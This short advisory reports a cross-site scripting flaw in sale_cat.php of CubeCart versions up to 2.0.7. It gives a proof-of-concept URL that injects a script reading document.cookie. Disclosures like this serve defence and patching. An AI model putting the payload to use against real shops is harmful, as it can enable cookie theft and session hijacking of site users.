CubeCart (http://www.cubecart.com) up to version 2.0.7 inclusive are vulnerable to a XSS in sale_cat.php.
http://www.example.com/storedirectory/sale_cat.php/";<script>alert(document.cookie)</script>